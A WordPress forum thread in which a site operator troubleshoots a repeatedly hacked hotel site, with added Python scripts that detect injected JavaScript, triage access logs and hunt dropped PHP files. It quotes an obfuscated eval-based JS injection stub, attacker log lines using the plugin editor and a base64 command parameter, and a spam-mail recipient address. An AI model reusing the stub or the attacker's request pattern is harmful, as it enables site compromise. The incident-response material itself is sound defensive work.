Forum Replies Created

Viewing 8 replies - 1 through 8 (of 8 total)
    Thread Starter sibianul

    (@sibianul)

    The favicon was also deleted by maldet, I remember it was an icon file, I wasn’t curious to get the file out of quarantine to check if it really had malicious code.

    The idea with wp-admin came while reading another blog with suggestions regarding securing WordPress, that was one of the suggestions, and also protecting the directory with an extra HTTP Auth password, but if you say it’s normal to have requests on the homepage from the wp-admin folder .. then this can’t be done

    Thread Starter sibianul

    (@sibianul)

    Thank you for the links, what about requests from the homepage to files inside wp-admin ? Is it normal for a plugin to request files inside the admin folder ?

    How to safely rename the wp-admin folder and still have the website working, without having any links to the new admin folder ?

    Thread Starter sibianul

    (@sibianul)

    The thing is that on this server I have around 300 websites, almost all built by me .. and every time something like this happens, it happens to clients that installed WordPress .. Joomla websites, and left them unupdated. One of my websites, about Sibiu City, had its last redesign back in 2007 .. yet no viruses are altering my files or sending huge amounts of emails. The same on all other websites, it happened like 5 times in the last 10 years, and each time it happened to a WordPress/Joomla website 🙁

    In wp-include there is a file class-phpmailer.php , isn’t this a wordpress file ?

    Thread Starter sibianul

    (@sibianul)

    Ohhh .. if anybody knew how much I hate the WordPress platform … this website started again to send emails, I just deleted 5000 from the server queue as now the server doesn’t let the client send any email, even if it's legit.

    At first look I can’t see any newly modified files but I will search all directories.

    It’s weird, I don’t see the actual sending file in the email headers, it just shows the domain name, maybe it sends somehow from the index.php file

    027T To: marinegmayer@gmail.com
    042  Subject: Do you hear me calling, sweetie?
    047  X-PHP-Script: hotelxxxxsibiu.ro/ for 127.0.0.1
    037  Date: Tue, 8 Mar 2016 13:03:11 +0200
    064F From: Gwendolyn Franklin <gwendolyn_franklin@hotelxxxxsibiu.ro>
    065I Message-ID: <311561b093ab13f3a7b09f4aa3672fe8@hotelxxxxxsibiu.ro>
    014  X-Priority: 3
    068  X-Mailer: PHPMailer 5.2.9 (https://github.com/PHPMailer/PHPMailer/)
    Thread Starter sibianul

    (@sibianul)

    Back on 16 February 2016 all the js files in WordPress were modified, I thought the modified date was 16 because I did the WordPress update …

    Now I downloaded all the files again through FTP and while downloading AVG Free antivirus was showing a continuously updating list with infected files, all of them were js files.

    Now I also cleaned all js .. I’ll see if there are even more issues, but still I don’t know how could it login with admin and wpupdatestream username …

    /*e9fe1c0a92286e523b7d9e59446f2c66*/;(function(){var hdirieys="";var tfsikfzk="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";for (var ynrhzsfd=0;ynrhzsfd<tfsikfzk.length;ynrhzsfd+=2){hdirieys=hdirieys+parseInt(tfsikfzk.substring(ynrhzsfd,ynrhzsfd+2), 16)+",";}hdirieys=hdirieys.substring(0,hdirieys.length-1);eval(eval('String.fromCharCode('+hdirieys+')'));})();/*e9fe1c0a92286e523b7d9e59446f2c66*/
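
The stub quoted above has a fixed shape: a 32-hex-character comment tag, an IIFE that turns a string of hex pairs into character codes, and a double eval() that first builds the string and then runs it. The following Python is an added analysis helper, not code from the post or from WordPress: it finds that shape in a JS file, recovers the decoded payload without executing anything, and strips the stub so the file can be diffed against a clean copy. The tag, variable names and payload in build_sample() are constructed for the demonstration; the real payload from the post is not reproduced.

```python
import re

# Shape of the injected stub quoted in the post:
#   /*<32 hex>*/;(function(){ ... var X="<hex pairs>"; for(...) parseInt(pair,16) ...
#   eval(eval('String.fromCharCode('+...+')')); })();/*<same 32 hex>*/
# The decoded string is JavaScript the stub would eval(); this helper only recovers it.
INJECT_RE = re.compile(
    r'/\*(?P<tag>[0-9a-f]{32})\*/;\(function\(\)\{'
    r'.*?var \w+="(?P<hex>[0-9a-fA-F]+)";'
    r'.*?eval\(eval\(.*?\)\);\}\)\(\);/\*(?P=tag)\*/',
    re.DOTALL,
)

# Constructed tag for the demonstration (assumption: any 32 hex chars, not the post's value).
CONSTRUCTED_TAG = "0123456789abcdef0123456789abcdef"


def decode_hex_pairs(hexstr):
    """Replicate the stub's decoder stage: each pair of hex digits becomes one character code."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string")
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def find_injections(js_source):
    """Return [(tag, decoded_payload)] for every stub found in a JS file. Nothing is executed."""
    return [(m.group("tag"), decode_hex_pairs(m.group("hex")))
            for m in INJECT_RE.finditer(js_source)]


def strip_injections(js_source):
    """Return the file with every matched stub removed, for comparison with a clean copy."""
    return INJECT_RE.sub("", js_source)


def build_sample(payload, tag=CONSTRUCTED_TAG):
    """Build a stub with the same shape as the quoted one around a benign, constructed payload."""
    hexstr = payload.encode("ascii").hex()
    return (
        f'/*{tag}*/;(function(){{var out="";var enc="{hexstr}";'
        'for (var i=0;i<enc.length;i+=2){out=out+parseInt(enc.substring(i,i+2), 16)+",";}'
        "out=out.substring(0,out.length-1);"
        "eval(eval('String.fromCharCode('+out+')'));})();"
        f'/*{tag}*/'
    )


if __name__ == "__main__":
    clean = 'jQuery(function(){ console.log("page ready"); });\n'
    infected = build_sample('console.log("constructed payload");') + clean
    for tag, payload in find_injections(infected):
        print(tag, "->", payload)          # shows the recovered second-stage JS
    print("stripped == clean:", strip_injections(infected) == clean)
```

Run it over every .js file under the site root and compare strip_injections() output against the same file from a fresh WordPress download; any difference that is not the stub itself deserves a separate look.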

    Thread Starter sibianul

    (@sibianul)

    Happened again, it was weird when I got an email that user admin logged in successfully to wp-admin, using an IP from Ukraine, after login he modified some files as you see below, I have changed the password of the admin user, that user was used by the guys that made the website and I also cleaned the modified files. This happened 3 days ago.

    Yesterday, I got another email:

    A user with username "wpupdatestream" who has administrator access signed in to your WordPress site.
    User IP: 176.104.52.19
    User hostname: s-176-104-52-19.under.net.ua
    User location: Kiev, Ukraine

    I blocked the IP in server firewall but I wonder how could he login with that username, from the same IP he logged in now a few days ago using admin username, I know it’s easy for him to hack again using a different IP. I will change the password of that username too …

    Line 202763: 176.104.52.19 - - [22/Feb/2016:21:42:18 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 200 29 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 202764: 176.104.52.19 - - [22/Feb/2016:21:42:19 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 200 883 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 202765: 176.104.52.19 - - [22/Feb/2016:21:42:19 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 200 883 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 208375: 176.104.52.19 - - [24/Feb/2016:08:29:46 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 404 20980 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 214139: 176.104.52.19 - - [25/Feb/2016:05:17:36 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 404 20980 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 224173: 176.104.52.19 - - [26/Feb/2016:14:13:43 +0200] "POST /wp-admin/edit-form-tags.php HTTP/1.1" 200 - "htpp://www.hotelparcsibiu.ro/wp-admin/admin-ajax.php" "-"
    Line 224174: 176.104.52.19 - - [26/Feb/2016:14:13:44 +0200] "POST /wp-admin/wp-temp.php HTTP/1.1" 200 8 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 224300: 176.104.52.19 - - [26/Feb/2016:15:20:43 +0200] "GET / HTTP/1.1" 302 - "http://hotelparcsibiu.ro/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 224301: 176.104.52.19 - - [26/Feb/2016:15:20:44 +0200] "GET /ro/ HTTP/1.1" 200 24356 "http://hotelparcsibiu.ro/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
    Line 224302: 176.104.52.19 - - [26/Feb/2016:15:20:45 +0200] "POST /wp-login.php HTTP/1.1" 200 4168 "-" "-"
    Line 224303: 176.104.52.19 - - [26/Feb/2016:15:20:47 +0200] "GET /wp-admin/plugin-editor.php HTTP/1.1" 200 40954 "-" "-"
    Line 224304: 176.104.52.19 - - [26/Feb/2016:15:20:47 +0200] "POST /wp-admin/plugin-editor.php HTTP/1.1" 200 44953 "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-"
    Line 224305: 176.104.52.19 - - [26/Feb/2016:15:20:49 +0200] "POST /wp-admin/plugin-editor.php HTTP/1.1" 302 - "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-"
    Line 224306: 176.104.52.19 - - [26/Feb/2016:15:20:50 +0200] "GET /wp-admin/plugin-editor.php?file=contact-form-7%2Fwp-contact-form-7.php&liveupdate=1&scrollto=0&networkwide&_wpnonce=726434a350 HTTP/1.1" 302 - "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-"
    Line 224307: 176.104.52.19 - - [26/Feb/2016:15:20:50 +0200] "GET /wp-admin/plugin-editor.php?file=contact-form-7/wp-contact-form-7.php&a=te&scrollto=0 HTTP/1.1" 200 46228 "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-"
    Line 224308: 176.104.52.19 - - [26/Feb/2016:15:20:51 +0200] "GET /wp-content/plugins/contact-form-7/wp-contact-form-7.php?sam=ZWNobyAicGlwaXNrYSI7 HTTP/1.1" 200 7 "http://www.hotelparcsibiu.ro/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"
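
The access-log excerpt above shows the pattern a defender wants to pull out of a raw log automatically: POSTs to a PHP file under /wp-admin/js/ (a directory that ships only static assets), a core-like filename with a hex suffix, use of the dashboard plugin editor, and finally a direct request to a plugin PHP file with a base64-encoded parameter. The Python below is an added triage script, not code from the post or from WordPress; it parses combined-format log lines and applies those four checks plus a base64-parameter decode. STATIC_DIRS, the editor file list and the suffix regex are assumptions written from core WordPress layout; four sample lines are taken from the post and the 203.0.113.7 line is constructed as a benign control.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" access-log format, as in the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Core directories holding only static assets (assumption from WordPress core layout).
STATIC_DIRS = ("/wp-admin/js/", "/wp-admin/css/", "/wp-admin/images/",
               "/wp-includes/js/", "/wp-includes/css/", "/wp-includes/images/")
EDITOR_FILES = ("/wp-admin/plugin-editor.php", "/wp-admin/theme-editor.php")
# Core-looking name with a hex run (containing at least one digit) appended,
# e.g. media-upload28b7c.php mimicking media-upload.php. Heuristic; may misfire.
RANDOM_SUFFIX_RE = re.compile(r'^[a-z][a-z-]*(?=[0-9a-f]*\d)[0-9a-f]{4,}\.php$')
B64_RE = re.compile(r'^[A-Za-z0-9+/]{12,}={0,2}$')

# Four lines from the post plus one constructed benign request (203.0.113.7).
SAMPLE_LINES = [
    '176.104.52.19 - - [22/Feb/2016:21:42:18 +0200] "POST /wp-admin/js/media-upload28b7c.php HTTP/1.1" 200 29 "/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"',
    '176.104.52.19 - - [26/Feb/2016:14:13:44 +0200] "POST /wp-admin/wp-temp.php HTTP/1.1" 200 8 "-" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"',
    '176.104.52.19 - - [26/Feb/2016:15:20:47 +0200] "POST /wp-admin/plugin-editor.php HTTP/1.1" 200 44953 "http://www.hotelparcsibiu.ro/wp-admin/plugin-editor.php" "-"',
    '176.104.52.19 - - [26/Feb/2016:15:20:51 +0200] "GET /wp-content/plugins/contact-form-7/wp-contact-form-7.php?sam=ZWNobyAicGlwaXNrYSI7 HTTP/1.1" 200 7 "http://www.hotelparcsibiu.ro/wp-admin/admin-ajax.php" "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14"',
    '203.0.113.7 - - [26/Feb/2016:15:30:00 +0200] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184 "http://www.example.test/" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    parts = urlsplit(e["target"])
    e["path"] = parts.path
    e["query"] = parse_qsl(parts.query, keep_blank_values=True)
    e["status"] = int(e["status"])
    return e


def looks_like_base64(value):
    """Return the decoded text if value is valid base64 of printable ASCII, else None."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def triage(e):
    """Apply the checks to one parsed entry and return the list of reasons it is suspect."""
    reasons = []
    path = e["path"]
    name = path.rsplit("/", 1)[-1]
    if path.endswith(".php") and path.startswith(STATIC_DIRS):
        reasons.append("PHP file under a static-assets directory")
    if RANDOM_SUFFIX_RE.match(name):
        reasons.append("core-like filename with appended hex suffix")
    if path in EDITOR_FILES:
        reasons.append("dashboard file editor used (%s)" % e["method"])
    if path.startswith("/wp-content/plugins/") and path.endswith(".php"):
        reasons.append("plugin PHP file requested directly, not via WordPress")
    for key, value in e["query"]:
        decoded = looks_like_base64(value)
        if decoded is not None:
            reasons.append("base64 parameter %s decodes to %r" % (key, decoded))
    return reasons


def triage_log(lines):
    """Return one record per flagged request; unparseable and clean lines are skipped."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        reasons = triage(e)
        if reasons:
            hits.append({"ip": e["ip"], "ts": e["ts"], "method": e["method"],
                         "path": e["path"], "status": e["status"], "reasons": reasons})
    return hits


def by_ip(hits):
    """Count flagged requests per client IP, to pick the address to block and investigate."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = triage_log(SAMPLE_LINES)
    for h in hits:
        print(h["ip"], h["ts"], h["method"], h["path"], h["status"], "; ".join(h["reasons"]))
    print(by_ip(hits))
```

Note what the heuristics miss: the POST to /wp-admin/wp-temp.php in the sample produces no flag, because its name neither lives in an asset directory nor carries a suffix. That is why a log triage like this is paired with a filesystem comparison against a clean WordPress copy rather than used alone.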
    Thread Starter sibianul

    (@sibianul)

    So far it’s clean, at the beginning of the week when I cleaned the general-template.php file it took about 15 minutes to have it back infected, twice …

    I believe those were the files that caused the website to be reinfected over and over again, I should download the raw access log file and search for those file names to see if that was really the case.

    In one of the links you sent me about securing WordPress there was a mention to add a password to the wp-admin directory, I did that from cPanel but it didn’t work anymore as it entered a continuous loop, the user / pass popup didn’t show up at all.

    Thread Starter sibianul

    (@sibianul)

    I wonder why this WP website gets hacked that often, on this server I have ~200 websites, only this one is blocked in Google.

    Is there any internal cron job done in WordPress ? In cPanel there’s no cron job.

    In the FTP log there’s only my IP address, the hacking is not done through FTP for sure.

    I did an “all files” scan using Wordfence and found a few suspects, now I’m checking and deleting them:

    [Feb 23 04:25:46] Done file contents scan
    [Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-admin/js/media-upload28b7c.php
    [Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-content/plugins/codestyling-localization/images/setup.php
    [Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-content/plugins/wordfence/images/setup.php
    [Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-includes/SimplePie/Content/Type/Sniffer263.php
    [Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-includes/Text/Diff/Renderer/session68.php
    [Feb 23 04:25:46] Adding issue: File contains suspected malware URL: /home/parcsb/public_html/wp-content/themes/hotelsibiu/style.css
    [Feb 23 04:25:47] Starting scan of database
    [Feb 23 04:25:47] Done database scan
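
Every path in the Wordfence output above fits one of two shapes: a PHP file dropped into a directory that should hold only images or scripts (images/setup.php, wp-admin/js/...), or a copy of a core file with digits tacked onto the name (Sniffer263.php, session68.php). The Python below is an added example, not code from the post, from Wordfence or from WordPress: it parses scan-log lines of the quoted kind, walks a site tree looking for those two shapes independently of the scanner, and reports which flagged paths still exist after cleaning. The asset-directory names, the suffix heuristic and the KNOWN_OK allowlist are assumptions; build_fixture() creates a constructed tree of placeholder files so the script runs offline.

```python
import os
import re
import tempfile

# Wordfence scan-log lines of the kind quoted in the post ("Adding issue: <kind>: <path>").
WF_ISSUE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] Adding issue: '
    r'(?P<kind>File appears to be malicious|File contains suspected malware URL): (?P<path>\S+)$'
)
# Directory names that should only hold static assets; a .php file inside is suspect (assumption).
ASSET_DIR_NAMES = {"images", "img", "js", "css", "fonts"}
# Core-looking name with digits/hex appended (Sniffer263.php, session68.php, media-upload28b7c.php).
# Heuristic: a letter immediately followed by a digit, so wp-contact-form-7.php is not matched.
SUFFIXED_RE = re.compile(r'^[A-Za-z][A-Za-z-]*[A-Za-z]\d[0-9a-f]*\.php$', re.IGNORECASE)
# Core files that would trip SUFFIXED_RE; an example allowlist the operator extends as needed.
KNOWN_OK = {"wp-includes/ID3/getid3.php"}

# Scan output copied from the post.
SAMPLE_WF_LOG = """\
[Feb 23 04:25:46] Done file contents scan
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-admin/js/media-upload28b7c.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-content/plugins/codestyling-localization/images/setup.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-content/plugins/wordfence/images/setup.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-includes/SimplePie/Content/Type/Sniffer263.php
[Feb 23 04:25:46] Adding issue: File appears to be malicious: wp-includes/Text/Diff/Renderer/session68.php
[Feb 23 04:25:46] Adding issue: File contains suspected malware URL: /home/parcsb/public_html/wp-content/themes/hotelsibiu/style.css
[Feb 23 04:25:47] Starting scan of database
""".splitlines()


def parse_wordfence(lines):
    """Extract (kind, path) pairs from Wordfence scan output; other lines are ignored."""
    found = []
    for line in lines:
        m = WF_ISSUE_RE.match(line.strip())
        if m:
            found.append((m.group("kind"), m.group("path")))
    return found


def hunt(root):
    """Walk a WordPress tree and return {relative_path: [reasons]} for suspect PHP files."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if rel in KNOWN_OK:
                continue
            reasons = []
            if os.path.basename(dirpath) in ASSET_DIR_NAMES:
                reasons.append("PHP file inside a static-assets directory")
            if SUFFIXED_RE.match(name):
                reasons.append("core-like filename with appended digits/hex")
            if reasons:
                flagged[rel] = reasons
    return flagged


def still_present(root, wf_paths):
    """Return the Wordfence-flagged paths that still exist under root (i.e. were not cleaned)."""
    present = []
    for p in wf_paths:
        # Wordfence may report absolute paths; assume the document root is .../public_html/.
        rel = p.split("public_html/", 1)[1] if os.path.isabs(p) and "public_html/" in p else p
        if os.path.exists(os.path.join(root, rel)):
            present.append(rel)
    return present


def build_fixture():
    """Constructed tree of placeholder files mirroring paths named in the post."""
    root = tempfile.mkdtemp(prefix="wp-hunt-")
    for rel in [
        "wp-admin/js/media-upload28b7c.php",                 # dropped file: in js/, hex suffix
        "wp-admin/js/media-upload.js",                        # legitimate asset
        "wp-content/plugins/wordfence/images/setup.php",      # PHP inside an images/ directory
        "wp-includes/SimplePie/Content/Type/Sniffer.php",     # legitimate core file
        "wp-includes/SimplePie/Content/Type/Sniffer263.php",  # suffixed copy
        "wp-includes/ID3/getid3.php",                         # legitimate, allow-listed
        "wp-content/plugins/contact-form-7/wp-contact-form-7.php",
    ]:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("<?php // constructed placeholder\n")
    return root


if __name__ == "__main__":
    root = build_fixture()
    for rel, reasons in sorted(hunt(root).items()):
        print(rel, "->", "; ".join(reasons))
    issues = parse_wordfence(SAMPLE_WF_LOG)
    print("not yet cleaned:", still_present(root, [p for _, p in issues]))
```

Point hunt() at the real document root instead of the fixture; the output is a list to compare, file by file, against a fresh WordPress download of the same version, since anything the scanner or these heuristics miss will show up there as an extra or differing file.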
